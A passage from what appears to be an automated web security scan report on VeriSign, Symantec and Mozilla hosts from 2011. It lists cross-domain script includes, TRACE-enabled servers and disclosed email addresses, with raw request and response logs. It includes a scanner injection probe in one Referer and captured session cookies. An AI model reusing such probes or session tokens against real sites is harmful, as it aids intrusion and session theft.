GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.44. https://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /
Issue detail
The response dynamically includes the following script from another domain:
https://www.googleadservices.com/pagead/conversion.js
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.45. https://www.verisign.com/products-services/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /products-services/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
16. TRACE method is enabled
There are 7 instances of this issue:
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received. Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
16.1. http://1168.ic-live.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://1168.ic-live.com
Path:
/
Request
TRACE / HTTP/1.0 Host: 1168.ic-live.com Cookie: 3a8169a39c743817
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Content-Type: message/http X-Cache: MISS from i2a-coll-17 X-Cache-Lookup: NONE from i2a-coll-17:80 Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21) Connection: close TRACE / HTTP/1.0 Host: 1168.ic-live.com Cookie: 3a8169a39c743817 ; cvt586=106159628; ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; cvt522=33083100; sid1168=1315603546sI0iG1jH0qF3 Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21) X-Forwarded-For: ...[SNIP]...
16.2. http://blogs.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Request
TRACE / HTTP/1.0 Host: blogs.verisign.com Cookie: c714ff1fc488237d
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Content-Type: message/http Connection: close TRACE / HTTP/1.1 Host: blogapp:8080 Cookie: c714ff1fc488237d ; v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0...[SNIP]...
16.3. https://cert.webtrust.org/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/
Request
TRACE / HTTP/1.0 Host: cert.webtrust.org Cookie: 96a6b86bb9621aaa
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:31 GMT Server: Apache/1.3.27 (Unix) PHP/4.3.1 mod_ssl/2.8.14 OpenSSL/0.9.7a Connection: close Content-Type: message/http TRACE / HTTP/1.0 Cookie: 96a6b86bb9621aaa Host: cert.webtrust.org
16.4. https://donate.mozilla.org/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/
Request
TRACE / HTTP/1.0 Host: donate.mozilla.org Cookie: f47eeb57d4e2c95f
Response
HTTP/1.1 200 OK Server: Apache Content-Type: message/http Date: Fri, 09 Sep 2011 22:14:47 GMT Connection: close Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ TRACE / HTTP/1.0 X-Cluster-SSL: 1 Host: donate.mozilla.org X-Cluster-Client-Ip: 50.23.123.106 Cookie: f47eeb57d4e2c95f ; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC; WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751 Connection: Keep-Alive
16.5. https://partnernet.symantec.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://partnernet.symantec.com
Path:
/
Request
TRACE / HTTP/1.0 Host: partnernet.symantec.com Cookie: aa6e229900a35a85
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:06 GMT Server: Apache/2.2.15 (Unix) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: partnernet.symantec.com Cookie: aa6e229900a35a85 ; JSESSIONID=JpgsTqLJpsGcTPQ9r6vf2nW4Lnx1ZQCYB8m9fcNQn2D7vsdhGhHr!-248941162; s_sv_112_s1=1@16@a//1315621570007; SymantecMobile=false; IS3_History=0-0-0____; s_sq=%5B%5BB%5D%5D; bizProdScrollVertical=0...[SNIP]...
16.6. http://press.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://press.verisign.com
Path:
/
Request
TRACE / HTTP/1.0 Host: press.verisign.com Cookie: 356f27a0513049ad
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: press.verisign.com Cookie: 356f27a0513049ad ; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(...[SNIP]...
16.7. https://press.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://press.verisign.com
Path:
/
Request
TRACE / HTTP/1.0 Host: press.verisign.com Cookie: dfcbafb64e98c2be
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:42:31 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: press.verisign.com Cookie: dfcbafb64e98c2be ; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(...[SNIP]...
17. Email addresses disclosed
There are 71 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
17.1. http://blogs.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /?tid=footer HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 11 May 2011 20:19:01 GMT ETag: "1a606f6-9f7a-c8827740" Accept-Ranges: bytes Content-Length: 40826 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.2. http://blogs.verisign.com/web-user-experience/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/web-user-experience/
Issue detail
The following email address was disclosed in the response:
Request
GET /web-user-experience/ HTTP/1.1 Host: blogs.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:59 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.0.4 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 70620 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard"> <head> <tit...[SNIP]... <a href="contact'>mailto:reshma.kumar@gmail.com ">...[SNIP]...
17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/assets/shared/js/jquery.cookie.js
Issue detail
The following email address was disclosed in the response:
Request
GET /assets/shared/js/jquery.cookie.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Server: Apache Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Age: 6982 Date: Fri, 09 Sep 2011 21:27:08 GMT Last-Modified: Wed, 19 Jan 2011 20:34:23 GMT Expires: Sun, 09 Oct 2011 13:03:09 GMT Content-Length: 4341 Connection: keep-alive /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu....[SNIP]... ll be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]...
17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]... <brian@cherne.net >...[SNIP]...
17.5. https://enterprise-ssl-admin.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://enterprise-ssl-admin.verisign.com
Path:
/
Issue detail
The following email address was disclosed in the response: enterprise-sslsupport@verisign.com
Request
GET / HTTP/1.1 Host: enterprise-ssl-admin.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:41:53 GMT Content-length: 1304 Content-type: text/html Connection: close <HTML> <HEAD> <TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE> <link href="../stylesheet.css" rel="stylesheet" type="text/css" /> </HEAD> <BODY> <table width=720 bord...[SNIP]... <A HREF="mailto: enterprise-sslsupport@verisign.com ">...[SNIP]...
17.6. https://fileconnect.symantec.com/javascript/calendar2.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/calendar2.js
Issue detail
The following email addresses were disclosed in the response: feedback@softcomplex.com, sales@softcomplex.com
Request
GET /javascript/calendar2.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 6722 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes // Title: Tigra Calendar // Description: See the demo at url // URL: http://www.softcomplex.com/products/tigra_calendar/ // Version: 3.1 (American date format) // Date: 08-08-2002 (mm-dd-yyyy) // Feedback: feedback@softcomplex.com (specify product title in the subject) // Note: Permission given to use this script in ANY kind of applications if // header lines are left unchanged. // Note: Script consists of two files: calendar?.js and calendar.html // About us: Our company provides offshore IT consulting services. // Contact us at sales@softcomplex.com if you have any programming task you // want to be handled by professionals. Our typical hourly rate is $20. // if two digit year input dates after this year considered 20 century. var NUM_CEN...[SNIP]...
17.7. https://idprotect.verisign.com/learnmore.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/learnmore.v
Issue detail
The following email address was disclosed in the response:
Request
GET /learnmore.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:38 GMT Content-Type: text/html Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 11736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.8. https://idprotect.verisign.com/orderstart.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/orderstart.v
Issue detail
The following email address was disclosed in the response:
Request
GET /orderstart.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/wheretouse.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:55 GMT Content-Type: text/html Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16954 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.9. https://idprotect.verisign.com/toolbar/activate.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/activate.v HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:43 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5737 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.10. https://idprotect.verisign.com/toolbar/download.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/download.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/download.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:39 GMT Content-Type: text/html Content-Length: 6532 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.11. https://idprotect.verisign.com/toolbar/home.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/home.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/home.v HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:02 GMT Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.12. https://idprotect.verisign.com/toolbar/install.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/install.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/install.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:40 GMT Content-Type: text/html Content-Length: 6820 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.13. https://idprotect.verisign.com/wheretouse.v
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/wheretouse.v
Issue detail
The following email address was disclosed in the response:
Request
GET /wheretouse.v HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:02 GMT Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
